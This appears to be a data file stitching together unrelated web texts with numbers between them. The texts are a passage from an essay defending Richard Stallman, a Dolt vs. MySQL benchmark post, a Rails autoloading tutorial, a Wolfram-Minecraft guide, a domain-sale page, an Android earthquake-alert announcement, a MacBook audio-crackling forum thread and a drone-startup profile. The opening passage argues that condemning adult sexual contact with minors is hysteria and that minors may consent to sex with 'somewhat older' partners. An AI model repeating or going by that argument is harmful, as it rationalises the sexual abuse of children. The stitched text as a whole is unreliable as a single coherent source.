without seeing anything sexual in that image. This is a decision that involves line drawing. We tend to have this hysteria where once we hear terms like pedophilia of course you are going to condemn anything that could possibly have that label. Of course you would. But societies around the world throughout history various cultures and various religions and moral positions have disagreed about at what age do you respect the autonomy and individuality and freedom of choice of a young person around sexuality. And the U.S. Supreme Court held that in a case involving minors right to choose to have an abortion. By the way, [contraception and abortion] is a realm of sexuality where liberals and progressives and feminists have been saying, Yes! If you’re old enough to have sex. You should have the right to contraception and access to it. You should have the right to have an abortion. You shouldn’t have to consult with your parents and have their permission or a judge’s permission because you’re sufficiently mature! And the Supreme Court sided in accord of that position. The U.S. Supreme Court said constitutional rights do not magically mature and spring into being only when someone happens to attain the state defined age of majority. In other words the constitution doesn’t prevent anyone from exercising rights, including Rights and sexual freedoms, freedom of choice and autonomy at a certain age! And so you can’t have it both ways. You can’t say well we’re strongly in favor of minors having the right to decide what to do with their own bodies, to have an abortion—what is in some people’s minds murder—but we’re not going to trust them to decide to have sex with somewhat older than they are. And I say somewhat older than they are because that’s something where the law has also been subject to change. On all issues of when you obtain the age of majority, states differ on that widely and they choose different ages for different activities. When you’re old enough to drive, to have sex with someone around your age, to have sex with someone much older than you. There is no magic objective answer to these questions. I think people need to take seriously the importance of sexual freedom and autonomy and that certainly includes women, feminists. They have to take seriously the question of respecting a young person’s autonomy in that area. There have been famous cases of 18 year olds who have gone to prison because they had consensual sex with their girlfriends who were a couple of years younger. A lot of people would not consider that pedophilia and yet under some strict laws and some absolute definitions it is. Romeo and Juliet laws make an exception to pedophilia laws when there is only a relatively small age difference. But what is relatively small? So to me, especially when he says he is re-examining his position, Stallman is just thinking through the very serious debate of how to be protective and respectful of young people. He is not being disrespectful, much less wishing harm upon young people, which seems to be what his detractors think he’s doing. by Hannah Wolfman-Jones - May 11, 2020 I have chosen to keep Stallman as a writer for . I believe Stallman to be quite possibly the best person in the world for defining and explaining free software. I do not believe any of his infractions—which led to a firestorm of controversy and resignation from MIT and his own foundation—to be so grave as to warrant his removal from the book and project. The paradox of Stallman is that while his pointedness and stubbornness leads many to dismiss him as a jerk, his stubbornness and confrontations are actually rooted in his life-long obsession with morality. Though you may disagree, there is ample reason to believe he has come to hold his views from a concerted, rigorous, good-faith effort to be a voice for good in the world. Ironically, given the smears against him, one of Stallman's core tenets seems to be consent! He has dedicated decades to arguing for free software, which protects computer users from nonconsensual activities being done on their machines (amongst other things). There is plenty of evidence that Stallman consistently applies his values of consent and freedom to romance and other relations. I find the claims that he is an “abuser” and “predator” online particularly misguided. This is my best attempt to do the right thing. To stand on principle, come what may. According to the Atlantic, a full 80 percent of Americans believe that political correctness is a problem in our country. While today some smear the free speech movement as a “racist dog-whistle” or a “far-right talking point,” it turns out the numbers don’t fit that narrative. Turns out just about everyone thinks we need more free speech. This includes large pluralities of all races (e.g. 75% of African Americans, 87% of Hispanics) and all ages (e.g. 79% of Americans under age 24). A 2017 poll of 2,300 U.S. adults, found that 71% Americans believe that political correctness has silenced important discussions our society needs to have and 58% of Americans believe the political climate prevents them from sharing their own political beliefs. And who can blame them? Stallman had to resign from the foundation he started in order to save it from a similar smear campaign. All over an email voicing a perspective shared by a world-renowned civil-rights lawyer and feminist. Voicing such a perspective was even decried as “abuse!” because it was so politically incorrect, but what happens if society gets “politically correct” wrong? And if we don’t allow the “politically incorrect” amongst us to speak, how will we ever know what stances considered “politically correct” are morally wrong? So you be the judge, Dear Reader. Do We The Web deserve to be #cancelled too? * Hannah Wolfman-Jones [1] is an environmental engineer who became interested in blockchain as a means to build a blockchain-based liquid democracy. She is the founder of the website [2] , as well as the editor of [3] , a book she coauthored with Nadine Strossen, Richard Stallman, Brittany Kaiser, Pia Mancini, and Santiago Siri. ↑ ** Nadine Strossen [4] is an American civil liberties advocate and feminist. She served as president of the ACLU from 1991 to 2008 [5] . She is a John Marshall Harlan II Professor of Law, Emerita [6] . Strossen has been called a “civil liberties luminary” for her life long commitment to the rights of women, children, the oppressed, and freedom of speech. She has written extensively on these subjects and constitutional law. ↑ Back to Voices of Support References and Notes
1
Database Performance: Dolt vs. MySQL
Dolt is a version controlled SQL database. Dolt's query interface is SQL, and it has Git-like version control features. Adding version control features to a SQL database has performance trade offs when comparing Dolt with traditional databases like MySQL. In particular relational databases use highly optimized storage layouts that are motivated query engine performance. Implementing version control features requires making compromises about the storage layout that impact query performance. We believe that the explosion of data centric business processes and applications justifies a database that makes this tradeoff. The purpose of this post is to show how we measure those performance tradeoffs and set clear expectations on Dolt performance. Our goal is to get Dolt to the point where it is no more than 2-4 times slower than MySQL. We spend the balance of this post showing how we measuring ourselves against that goal. Database solutions, for example MySQL and Postgres, are designed to be application backing stores. More precisely they are optimized for online transaction processing (OLTP) use cases, defined loosely as as: Processing in which the system responds immediately to user requests. Dolt's version control features were designed with a different set of use-cases in mind, most of which are not OLTP. For example, we are currently onboarding a customer using Dolt as a backend for researcher output. They use Dolt's branching functionality to compare results submissions before combining those submissions to a master copy. We have other users who are using Dolt as an ETL ingestion point, ensuring that all third party data is robustly versioned. Dolt's commit graph acts as a "configurable boundary" for their organization, providing users with simple tools for controlling what data comes through that boundary. Despite early adoption from non-OLTP use case, users still want fast query performance. Faster is obviously better. We think as Dolt gets faster, Dolt could make sense for some OLTP use cases that are willing to trade performance for version control features. We are really interested in supporting as many use cases as we can long term. Thus, we are committed to making Dolt as fast as possible. As stated at the outset, our goal is to get Dolt to the point where it is no more than 2-4 times slower than MySQL for sysbench's standard test suite of OLTP and non-OLTP tests. Additionally, we will implement custom tests that emphasize common use-cases for Dolt, which we expect to be no more than 2 times slower than MySQL. Finally, we consider anything that is 10 times slower than MySQL a bug that we will prioritize fixing. We recently blogged about our approach to benchmarking Dolt, though our documentation is the place to go for the latest information. To recap, we use sysbench, an industry standard tool for benchmarking databases to evaluate both Dolt and MySQL using the same set of tests. For example, our most recent release is 0.22.6, and we wanted to compare this to 0.22.2, the prior release. We ran the following command, noting that $DOLT_CHECKOUT is a checkout of Dolt's GitHub repository: $ cd $DOLT_CHECKOUT/benchmark/perf_tools $ ./run_benchmarks.sh all 100000 oscarbatori 0.22.2 0.22.6 At a high level, for each tag and MySQL this: All the results, for MySQL and each Dolt tag, are associated with a single run ID which denotes an invocation of run_benchmarks.sh. This means that we can identify rows that were run on the same hardware at the same time, giving us a degree of hardware context isolation. For example, this run was associated with the unique run ID 7dffeeb22fb11efaec478ef3, which identifies the results: $ ls -ltr output -rw-r--r-- 1 oscarbatori staff 6846 Dec 4 11:13 7dffeeb22fb11efaec478ef3.csv The all parameter denotes the following list of tests, though passing a comma separated list of tests also works for more targeted benchmarking: bulk_insert oltp_delete oltp_insert oltp_point_select oltp_read_only oltp_read_write oltp_update_index oltp_update_non_index oltp_write_only select_random_points select_random_ranges This is the complete list of standard sysbench tests. You can find these results posted to DoltHub, where you can run SQL against them. Here we present the results as they appear in the Dolt documentation: This analysis highlighted the select_random_ranges result as particularly bad, and it will in fact be fixed in the next release. In the previous section we pointed at these results hosted on DoltHub. We can easily clone and analyze the results in SQL as follows to compare how performance has changed between the two most recent versions: $ dolt clone dolthub/dolt-benchmarks && dolt-benchmarks cloning https://doltremoteapi.dolthub.com/dolthub/dolt-benchmarks 185 of 185 chunks complete. 0 chunks being downloaded currently. $ dolt sql ~/Documents/dolt-dbs/dolt-benchmarks/test/dolt-benchmarks|>> dolt sql # Welcome to the DoltSQL shell. # Statements must be terminated with ';'. # "exit" or "quit" (or Ctrl-D) to exit. dolt_benchmarks> SELECT -> dolt_0222.run_id as run_id, -> dolt_0222.test_name as test_name, -> dolt_0222.sql_transactions as dolt_0222, -> dolt_0226.sql_transactions as dolt_0226, -> mysql.sql_transactions as mysql, -> ROUND((1.0 * mysql.sql_transactions) / dolt_0222.sql_transactions, 1) as dolt_0222_multiple, -> ROUND((1.0 * mysql.sql_transactions) / dolt_0226.sql_transactions, 1) as dolt_0226_multiple -> FROM -> sysbench_benchmark as dolt_0222 -> inner join sysbench_benchmark as dolt_0226 -> on dolt_0222.run_id = dolt_0226.run_id -> and dolt_0222.test_name = dolt_0226.test_name -> inner join sysbench_benchmark as mysql -> on dolt_0222.run_id = mysql.run_id -> and dolt_0222.test_name = mysql.test_name -> -> WHERE -> dolt_0222.run_id = '7dffeeb22fb11efaec478ef3' -> and dolt_0222.database = 'dolt' -> and dolt_0222.committish = '0.22.2' -> and dolt_0226.database = 'dolt' -> and dolt_0226.committish = '0.22.6' -> and mysql.database = 'mysql' -> ORDER BY -> dolt_0222; +-----------------------+-----------+-----------+---------+--------------------+--------------------+ | test_name | dolt_0222 | dolt_0226 | mysql | dolt_0222_multiple | dolt_0226_multiple | +-----------------------+-----------+-----------+---------+--------------------+--------------------+ | oltp_insert | 1302 | 1167 | 6099 | 4.7 | 5.2 | | oltp_point_select | 6401 | 4819 | 32925 | 5.1 | 6.8 | | oltp_read_only | 268 | 228 | 1894 | 7.1 | 8.3 | | bulk_insert | 308783 | 308783 | 2278717 | 7.4 | 7.4 | | oltp_update_non_index | 803 | 767 | 5971 | 7.4 | 7.8 | | select_random_points | 457 | 400 | 4101 | 9 | 10.3 | | oltp_update_index | 496 | 461 | 6199 | 12.5 | 13.4 | | oltp_read_write | 90 | 88 | 1328 | 14.8 | 15.1 | | oltp_write_only | 141 | 122 | 3335 | 23.7 | 27.3 | | oltp_delete | 883 | 789 | 21847 | 24.7 | 27.7 | | select_random_ranges | 97 | 93 | 6109 | 63 | 65.7 | +-----------------------+-----------+-----------+---------+--------------------+--------------------+ Our conclusion from this is that while Dolt performance has improved, there is still a long way to go. As we move further along with our implementation it will become progressively harder to find large performance improvements. This post laid out our performance commitments to our users and customers, present and future, and demonstrated our mechanism for repeatably measuring ourselves against that commitment with every release of Dolt.
2
Demystifying Rails Autoloading
When I first started learning Rails back in the day, it was my first introduction to Ruby: I was learning them both at the same time. As a result, the line between them was rather blurry; I didn’t know what was coming from Ruby, and what was coming from Rails. The Rails approach of monkey-patching Ruby didn’t help. If I’m being honest, I didn’t realize that Object#blank? wasn’t a Ruby method until only a few years ago. I think it’s really important to understand the software you’re using, particularly big frameworks like Rails that follow convention over configuration and thus end up magically doing things for you. What are you supposed to do when the magic is gone? Today I want to talk about one such piece of magic: why you need to require things in Ruby, and why you (generally) don’t in Rails. First of all, you’ll note that the title refers to Rails autoloading. I did that for the SEO, but that’s not the only piece in play, here. In fact, there are three: Let’s take each in turn. Note that for all my examples, I’m using version 3.0.1 of Ruby via RVM, with a gemset made particularly for this purpose. Ruby does no hand-holding, and has no magic. In general, you must require everything. Let’s investigate this with a simple example. Create a new directory for this example with two files in it, one of them executable: Make ~/ruby-example/foo.rb look like this: class Foo def hello puts 'hello, world!' end end This file defines a simple class with a single method that prints a message. Now let’s fill out ~/ruby-example/main.rb to use it: #!/usr/bin/env ruby foo = Foo .new foo.hello This simply instantiates our class and runs the method that should print our message. Let’s run it: This doesn’t work because Ruby has no magic here: it has no idea what Foo is, despite the fact that the file defining it is sitting right next to the one you’re executing. You need to require it. Make ~/ruby-example/main.rb look like this: #!/usr/bin/env ruby require_relative 'foo' foo = Foo .new foo.hello Run it again, and behold success: In general you need to be pretty explicit in Ruby about your dependencies. In trade, it’s usually pretty easy to determine where your dependencies are coming from, since there’s an explicit require chain that pulls it in. One could make the case that needing to explicitly include everything you’re using is tedius. This is actually one of the roles that Bundler can play. Most folks know that Bundler can be used to manage your dependencies, but did you know that it can also be used to require those dependencies? Create a new directory for this example with two files in it, one of them executable: The ~/bundler-example/Gemfile is used by bundler to control your dependencies. Make it look like this: The hello-world gem is useful because it just prints a message when you require it. Install it: Now make ~/bundler-example/main.rb look like this: #!/usr/bin/env ruby require 'bundler/setup' Bundler .require That’s the message printed by the hello-world gem when you require it, as I mentioned above. That means Bundler included it for you, as a result of it being part of your Gemfile. You can hand Bundler.require different groups to limit what it requires for you, as well (production versus development or test, for example). Now that you’re familiar with this technique, go to any Rails application and check out config/application.rb, and you’ll see something like this: # ... # Require the gems listed in Gemfile, including any gems # you've limited to :test, :development, or :production. Bundler .require(* Rails .groups) # ... So Rails applications do this for you by default, which is why you generally don’t need to require any of your dependencies. There are caveats, however. Lots of Rails developers (including me) have settled on a modular approach to developing Rails applications, which means that a given application is split across a number of gems, which are often Rails engines. If you’re also in this camp, one thing to keep in mind is that gems (including engines) do not have this functionality. Gems generally execute within the context of the main application’s Gemfile, so it can’t lean on Bundler like this. Gems are expected to require their own dependencies. That doesn’t mean you need to do it in every file, though, if that annoys you. Ruby’s require has global effect, which means once something is required in one place, it can be used everywhere. If you have a file which is generally loaded as part of using the gem (e.g. lib/<gem name>.rb), you can put your requires there and just use them everywhere. So Bundler magic covers why you don’t need to require your gem dependencies, but what about other .rb files within the same app (or engine)? If you’re familiar with Rails, you may have noticed you generally don’t need to require those either. That flies in the face of our understanding of Ruby, and it’s thanks to Rails magic called autoloading. There are other resources that descrive Rails autoloading in detail. Those are recommended reading, so I won’t repeat them. The general idea is this: if you access a constant that is missing in the current execution context (e.g. a class defined in another file), Rails will try to find and require the file that defines it for you by searching a pre-defined set of autoload paths following a convention where each namespace for the constant equals a directory. A simplistic example: if you try to access Bar and it’s not defined, Rails will quickly check to see if there’s a bar.rb directory in any of the autoload paths. If there’s not, it’ll either complain or you’ll get the standard Ruby error for trying to access an undefined thing. If you try to access MyModule::Bar, it’ll search those same autoload paths for my_module/bar.rb. As a caveat, Rails engines don’t add their lib/ directory to the set of autoload paths by default, but you’ll notice engine developers often do it themselves for consistent behavior. Rails has done a magnificent job of making it trivial to get up and running developing new web applications, thanks to its convention-over-configuration approach. Its use of Bundler and autoloading to handle requires is no small part of that overall philosophy, and I suspect it’s a large reason for its success. That said, if you never really try to understand what Rails is doing for you, you will eventually get bitten when it doesn’t do what you expect. Gaining at least a small insight into how this particular piece of the puzzle works will pay dividends down the road, and I hope this was helpful in accomplishing exactly that.
1
Programming Minecraft on the Raspberry Pi with Wolfram (2018)
The standard Raspbian software on the Raspberry Pi comes with a basic implementation of Minecraft and a full implementation of the Wolfram Language. Combining the two provides a fun playground for learning coding. If you are a gamer, you can use the richness of the Wolfram Language to programmatically generate all kinds of interesting structures in the game world, or to add new capabilities to the game. If you are a coder, then you can consider Minecraft just as a fun 3D rendering engine for the output of your code. The first step is to make sure that you have all the right components. Make sure that you have the latest version of the operating system, Minecraft and the Wolfram Language. You do this by connecting your Raspberry Pi to the network, opening the Terminal app and typing the following: sudo apt-get update. sudo apt-get dist-upgrade sudo apt-get install minecraft-pi Now open Mathematica on the Pi, or another computer, and type: … followed by Shift + Return to evaluate it. If all went well, we are ready to start. The MinecraftLink library adds a small set of new commands to the Wolfram Language for connecting to a running Raspberry Pi Minecraft game. Start by launching Minecraft on the Raspberry Pi, and then start a fresh game or open an existing one. You must have a Minecraft game open before you can connect to it from the Wolfram Language. In the Wolfram Language, load the library by evaluating the following: This extends the Wolfram Language with the following new commands: You can find documentation on these by evaluating MinecraftHelp[] after you have installed the link. You can control a Minecraft game running on the Raspberry Pi from the Wolfram Language running on the same Raspberry Pi, or from any other computer that has a network connection to the Pi. If you’re connecting from a different computer, you must now tell the Wolfram Language the name or IP address of the Raspberry Pi where Minecraft is running… You don’t need to do this if both programs are on the same machine, but if you need to reset the connection, you can use MinecraftConnect[] or MinecraftConnect["localhost"]. If you get a “Cannot connect” message then the problem is either you have the wrong IP address or no network connection to the Pi, or you forgot to start a Minecraft game first. Let’s test to see if that worked by evaluating the following code: MinecraftChat["Hello from the Wolfram Language"] You should see the message appear briefly in the game chat area: We need to find out where we are in the Minecraft world. Minecraft uses a simple 
{x, y, z} coordinate system, where x and z are the horizontal directions (x is left/right if you have just started the game) and y is the vertical direction. If you have started a fresh game, you will be near to {0, 0, 0}. You can see the coordinates in the top-left corner of the screen, but to get them programmatically you can use: We can teleport the character to a new location (in this case, up in the air) with: If we have just started a game, then 10 blocks in front of us is {0, 10, 0}. But depending on how mountainous the terrain is, that block might be above or below ground. We can find the surface level with: We can test that by looking at the block at that position. It should be Air. And the block below it should be something solid: Now we can start building. We can place blocks of any type—for example, "Wood": We remove them by just overwriting the block with something else, such as "Air": But if you want a full undo, you must precede your changes with: And then if you don’t like your changes, you can undo them with: The list of the 156 available Minecraft block names is in the symbol $MinecraftBlockNames: One reason to use the Wolfram Language for this is that it handles all kinds of interesting 2D and 3D objects, and I have set up the SetBlock command to handle these fairly automatically. For example, let’s paint a letter X in the sky in gold. We can remove it again by replacing it with "Air": By default, rasterized content will be 12 blocks wide, so if you need more detail, you can increase that with an option: Anything you can create in the Wolfram Language can be made into blocks. Here is a plot of the function Sin [x]: You can also control the orientation of rasterized images with an option Orientation. If the content is a 3D geometry, then it will be rasterized in 3D: There are lots of 3D geometry primitives, and they can be combined in many ways. Here are some cuboids, a pyramid and a sphere to make a house: (*Main house frame*)MinecraftSetBlock[{pos,pos+{8,3,8}},"Wood"]; (*Windows*)MinecraftSetBlock[{pos+{1,0,0},pos+{7,3,8}},"Glass"];(*Make it hollow*)MinecraftSetBlock[{pos+{1,0,1},pos+{7,3,7}},"Air"];(*Add a doorway*)MinecraftSetBlock[{pos+{4,0,0},pos+{4,1,0}},"Air"];(*Add a roof*)MinecraftSetBlock[pos+{0,4,0},"WoodPlanksSpruce",Pyramid[],RasterSize->12];(*Decorate with gold ball*)MinecraftSetBlock[pos+{3,8,2},"GoldBlock",Sphere[],RasterSize->5];) OK, I’m not much of an architect! We can look at our creation from the air by controlling the camera: Finally, we can interact with blocks that you hit using the right mouse button while holding a sword. The left mouse button just places and smashes blocks, but the right mouse button creates events that wait for us to read and act on them. You can read these with: This shows that since the game started, I have done two of these special hits, each time on the same block at {–1, 2, 2}, on face number 1 (the top of the block). I am player 1, but there could be multiple players. I can fetch these pieces of information by position and name. For example, HitHistory[–1] is the last hit, and we extract its "Position" information and use that coordinate in MinecraftGetBlock to discover the type of block that was most recently hit: And we can clear the data with: As a simple example, let’s monitor this list every second and create an explosive “super hit.” I will define the explosion first. It is a function that takes a position and places a large sphere of air at that position: Now I create a scheduled task to run every second, and apply that function to the hit history: And now when I strike the ground in front of my house with my sword, using the right mouse button, a huge hole appears… I can remove the monitoring task with: There are a few more commands in the MinecraftLink package that you can read about in the documentation after you have installed the link. As well as giving you a simple programming interface to Minecraft, similar to other languages, the Wolfram Language contains hundreds of high-level functions that let you develop much more exciting projects quickly; you might want to check out some of the 3D geometry, 3D image processing and built-in data sources as a starting point. I will return soon with a few projects of my own. Download this post as a Wolfram Notebook.
1
Selling Singleproduct.store
Buyer Protection Program When you buy a domain name at Dan.com, you’re automatically covered by our unique Buyer Protection Program. Read more about how we keep you safe on our Trust and Security page. Next to our secure domain ownership transfer process, we strictly monitor all transactions. If anything looks weird, we take immediate action. And if the seller doesn't deliver on their part of the deal, we refund you within 24 hours. Fast & easy transfers 98% of all domain ownership transfers are completed within 24 hours. The seller first delivers the domain to us, then we send you your tailored transfer instructions. Need help? Our domain ownership transfer specialists will assist you at no additional cost. Hassle free payments Pay by bank wire and get a 1% discount or use one of the most popular payment options available through our payment processor, Adyen. Adyen is the payment platform of choice for many leading tech companies like Uber & eBay. Make an offer conditions ) Value Added Tax The Value Added Tax (VAT) is a consumption tax applied in the European Union (EU) to all goods and services. Who has to pay VAT? All consumers in the EU are charged VAT on the purchase of goods and services. Businesses in the EU buying from a business in the same country are also charged VAT. Businesses in the EU buying from a business in a different EU country are not charged VAT. Consumers and businesses outside of the European Union are not charged VAT. VAT example The VAT rate provided on this page is only an example. It will be calculated accordingly during the checkout process after entering your billing details. VAT calculation example What do I pay? Costs in USD Price excl. VAT USD $1,000 21% VAT USD $210 Total Price USD $1,210 Estimate in USD ) Conversion This amount is an estimate based on the most recent currency conversion rate. Pricing estimate in USD What do I pay monthly? Costs in USD Price excl. VAT $ 0% VAT $ Total Price $ The domain name is for sale! singleproduct.store Make an offer My offer in USD ) Free Ownership transfer ) Free Transaction support )Secure payments The simple, safe way to buy domain names No matter what kind of domain you want to buy, we make the transfer simple and safe. Seller's notes about singleproduct.store Create your single product store. Explore other popular domains from the seller
18
Earthquake detection and early alerts, now on your Android phone
Earthquakes happen daily around the world, with hundreds of millions of people living in earthquake prone regions.  An early warning can help people prepare for shaking, but the public infrastructure to detect and alert everyone about an earthquake is costly to build and deploy.  We saw an opportunity to use Android to provide people with timely, helpful earthquake information when they search, as well as a few seconds warning to get themselves and their loved ones to safety if needed. Sending earthquake alerts to Android devices in California First, we collaborated with the United States Geological Survey (USGS) and California Governor's Office of Emergency Services (Cal OES) to send earthquake alerts, powered by ShakeAlert®, directly to Android devices in California. Developed by the nation’s leading seismologists, the ShakeAlert system uses signals from more than 700 seismometers installed across the state by USGS, Cal OES, University of California Berkeley, and the California Institute of Technology. A few seconds of warning can make a difference in giving you time to drop, cover, and hold on before the shaking arrives. Related:  5 new things your Android phone can do Video format not supported Building the world’s largest earthquake detection network  Installing a ground network of seismometers, as California has done, may not be feasible in all impacted areas around the world. So we’re using the reach of Android’s platform to help detect earthquakes. Starting today, your Android phone can be part of the Android Earthquake Alerts System, wherever you live in the world. This means your Android phone can be a mini seismometer, joining millions of other Android phones out there to form the world’s largest earthquake detection network. All smartphones come with tiny accelerometers that can sense signals that indicate an earthquake might be happening. If the phone detects something that it thinks may be an earthquake, it sends a signal to our earthquake detection server, along with a coarse location of where the shaking occurred. The server then combines information from many phones to figure out if an earthquake is happening. We’re essentially racing the speed of light (which is roughly the speed at which signals from a phone travel) against the speed of an earthquake. And lucky for us, the speed of light is much faster! To start, we’ll use this technology to share a fast, accurate view of the impacted area on Google Search. When you look up “earthquake” or “earthquake near me,” you’ll find relevant results for your area, along with helpful resources on what to do after an earthquake. Video format not supported We’ve worked with globally-renowned seismology and disaster experts Dr. Richard Allen, Dr. Qingkai Kong and Dr. Lucy Jones to develop this crowdsourced approach for detecting earthquakes all around the world. You might be wondering, “what’s next?” We’re starting with earthquake alerts in California since there’s already a great seismometer-based system in place. Over the coming year, you can expect to see the earthquake alerts coming to more states and countries using Android’s phone-based earthquake detection. POSTED IN:
2
MacBook Pro Cracking and Popping Sound
You’re now watching this thread. If you’ve opted in to email or web notifications, you’ll be notified when there’s activity. Click again to stop watching or visit your profile to manage watched threads and notifications. You’ve stopped watching this thread and will no longer receive emails or web notifications when there’s activity. Click again to start watching. Hello, is it anyone here ( or on this planet ) that can help with this issue on Catalina Mac OS 10.15.5 Beta 3 (19F72f). I am using MacBook Pro 16 inches. 😟 p p p 193k I would like to know as well. I noticed the cracking sound when watching a concert on Youtube yesterday. I thought it was a recording problem. I then chose another concert, it was the same. Very annoying! p p p Catalina has a big issue with CoreAudio this time or I don't know exactly what it is. But if you are not producing music like me switch it to 48 kHz. I think it can help but is not fix the problem. Over 6 months Catalina is still stuck with this sound issue, especially people like me with brand new MCP16 inches. P.S. I have seen this problem with cracking and popping sound from EL CAPITAN. Every new MAC OS has this problem I don't know what is wrong, hardware, or OS but absolutely every time when the new OS is come out this problem is like some that are created to be like that, always. 😟 But this time it looks very long time to be fixed and there is no solution at the moment. p p p BTW Catalina Mac OS 10.15.5. BETA 4 still can not fix this issue ... is so important for me... I am music producer and this killed my work.... p p p I am sorry to hear that 10.15.5 19F83c did not fix your issue. It did for me. p p p I *really* want to see the flow of audio in macOS, and the changes in gain/amplitude along the way. If I use the test osc plugin in Logic Pro X, running thru a specific CoreAudio driver, I can succesfully manage keeping a consistent gain structure all the way thru my mixer, using Apple supplied Class-Compliant driver. 0db sine wave is exactly that all the way thru. Easy enough. If I go over that, I hear distortion. Now... safe to say that's calibrated, but... if I use the Music app, or audio coming from Safari, signal is about 4.5db hotter. That simply *cannot* be right. Send that to internal speakers and of course they're cracking and popping. p p I am with the beta version of the new os BIG SURE and this new MAC OS still CAN NOT fix this problem with the sound. I already spoke with Apple because I want back my money because this is ridiculous. Super expensive computer with this problem. I've made one Video for youtube 33 min and share all problems with 16-inch pro and Catalina and 265 people around the world contacted me with the same issue. Apple DONT CARE ABOUT THE SOUND and we never gonna see perfectly work machine with this I am 110% sure. Sad but true. p p p Obviously the problem isn't fixed yet by Apple...I have bought a Mac Pro (Early 2009) now running macOS 10.14.6 (18G5033) and added RAM and Graphic card to suit my needs.Then I realized that using Safari (100% of the time), or Spotify (85% of the time) the audio will crackle and pop every seconds creating a distortion. I am super disappointed that this problem is seen by hundreds of people and still isn't heard / listened too.At least I can use Chrome and the sound is perfect.. Can you explain wt* does this means? Apple?....I guess not. problems in the l of Mojave and Catalina in my opinion...Just because you know, Apple...They want you to buy the all the time and upgrade to the latest software all the time.I hope we will see an engineer create a revolution and releasing publicly the fix XD (Maybe even a movie hahah):/ DeepCore Audio Kerne LATEST p p I also have the same issue and I have updated to 10.15.5. There is a new version 10.15.6 availble today so I will install it to see if this fixes the issue p p Same Problem here, i have an expensive audio interface connected and always my imac is crackling around when im playing some music from daw or even itunes!macbooks and ios is working propertly,@apple please FIX THIS: CATALINA: 10.15.6 (19G73)iMac (27-inch, Late 2012), 3,2 GHz Quad-Core Intel Core i5 p p p Anyone heard anything? I'm seeing several having the same problem.I just got a brand new iMac, Catalina 10.15. Intermittent Audio crackles and glitches. All internal - haven't even hooked up my audio interface yet.Is this worth trying to exchange it? p p Hi(all 13 inch models)i used macbook pro 2013, no audio issueupgraded to 2015, used it for years, no audio issueswaited for escape key to get back, and got 2020 (4 ports)running OS 10.15.6 (19G2021). had it on 10.15.4 tooso basically i upgraded (not to mention $$$) to a bug?for once, can apple get everything right? Rest in peace Steve, Rest in peace Apple ?only if I was not for the track pad and i was not an iOS developer :-(really starting to get ****** since 2016i know no one is going to even bother to take a look at the issue by my post here, its my attempt to get it out of my system.thats what the forums are for now a days. p p p I'm wondering when will apple release an update to fix this problem The problem happened after i updated to MacOS Catalina 10.15.6 and i've installed 10.15.7 update as well and the problem is still there. p p p Spent thousands of dollars on a fully upgraded MacBook bro (2019) and the best audio interface you can get. Unfortunately my MAC was set on automatic updates now I literally can’t work it’s embarrassing. Not only can I not use any of my paid plugins, but I also can’t seem to record without logic or Fl studio crashing even without any plug ins! What am I supposed to tell my clients? Apple needs to fix this ASAP p p p Hello I am still having this issue, i am so surprised why haven't apple fixed this ? I am facing Crackling from speaker but only when i open simulator, My macbook is new i bought this 75 days ago and yet facing so many problems like this i am disappointed in Apple. I am using updated OS: MacBook Pro (16-inch, 2019) MACOS 10.15.7I have been searching alot couldn't find any solution to this. I am developing an App that is based on Videos, such as a video editing App but i am unable to test the application because of the crackling sound whenever i play audio when simulator is opened it makes crackling noise . p p p It just happened to me on Catalina 10.15.7, MB Pro 16. I thought my speakers were about to **** up... it was scary to say the least. p p p
1
Entrepreneur Raised $73M to Create Autonomous Drones
Dor Abuhasira has already raised over $70M for his tech startup, and it’s soaring in more than one way. During our interview on the DealMakers Podcast, Dor Abuhasira shared his unique path of growing up and becoming an entrepreneur out of the Startup Nation. Plus, his fundraising experiences, the challenges of being a technical founder, and his top insights for bringing in cofounders, finding a viable business model, and starting your own business. Listen to the full podcast episode and review the transcript here. *FREE DOWNLOAD* The Ultimate Guide To Pitch Decks Here is the content that we will cover in this post. Let’s get started. 1. From Engineering To Entrepreneurship 2. Perceptions, People & Profitable Products 3. Joining Elevator Fund We’ve featured a number of highly successful tech entrepreneurs out of the ‘Startup Nation’ on the Dealmakers Show over the past couple of years. Dor Abuhasira took a rather different path growing up and falling into entrepreneurship than most. Dor told our audience about his experience growing up in a Kibbutz in Israel. This is a community in which everyone gets together to work and share everything they have. A unique lifestyle in which up until around six years old all of the children would sleep and live together in a separate building with a guard. While it may sound wild to many who have grown up in the west, Dor actually recalls it as being a good experience and great childhood. While he gained some early exposure to computers, it wouldn’t be until much later, almost 28 years old, before he started putting tech and startups together. His father gave him a computer at a young age, and he not only enjoyed playing those classic old school games but programming too. Much of his schoolwork was done on computers. However, while many other tech entrepreneurs we’ve featured on the Dealmakers Show have come out of specialist technology and intelligence units in the Israeli military, Dor Abuhasira had a different experience with his mandatory military service. Instead of intense technical training in the military, Dor’s biggest takeaways from this time really centered on character building, and when it comes to being an entrepreneur, he says that it is probably the best asset you can have. He learned to constantly solve problems, to handle tough situations, and to gain confidence in leading others. After his military service, Dor took an extended trip around the world and through South America. Then he headed back to school to study electrical engineering. On graduation, the logical next step was to get to work. He headed into the corporate environment, and learned how to build real products, R&D, how the high tech industry worked, and what his value was in creating products. Here, he quickly learned two things: On his journey of building his own startup, Dor has learned quite a bit about common misconceptions, the people you need to add to your team, and overcoming the challenges of being a technical founder to build products with real commercial value. See How I Can Help You With Your Fundraising Efforts Fundraising Process : get guidance from A to Z. Materials : our team creates epic pitch decks and financial models Investor Access : connect with the right investors for your business and close them Book a Call Since childhood Dor had been building things in a garage with his friend Raviv Raz. Raviv had been working at the largest drone manufacturer in Israel, Israel Aerospace Industries. They accomplished a lot on the weekends, including flying drones and retrieving aerial images and autonomously sending out drones. Together they decided they could accomplish some pretty amazing things, and struck out to co-found their startup Percepto together. Then they added Sagi Blonder to the team that Dor had met while getting his Master’s in computer vision at Ben Gurion University. They wanted the best possible tech team, as the common wisdom at the time was that if you have the best technology product, then everything else is solved. Of course, that can be far from the truth in reality. They also learned not to rely on the media for how hot a market is, and how big the demand really is. Drones may have been hot in magazines and on the web, but they soon found out that real commercial demand wasn’t there. Everyone, including VCs, loved the idea of drones. They would happily arrange meetings to see them in action. Yet, when it came to sales and putting real capital in the bank, it just wasn’t happening. The real tipping point for Dor was when they joined startup accelerator Elevator Fund. The little bit of seed funding certainly helped. Though more importantly, their technical team was forced to defend their opinions, get clarity on their value, and figure out how to translate what they were saying to potential investors and customers. They’ve now raised at least $73M in capital, and count giant organizations worth tens of billions of dollars as clients. That includes major power companies on the US east and west coast, such as FPL in Florida and PG&E in California. These organizations are using their autonomous drones to accumulate much more data through constant inspections, and 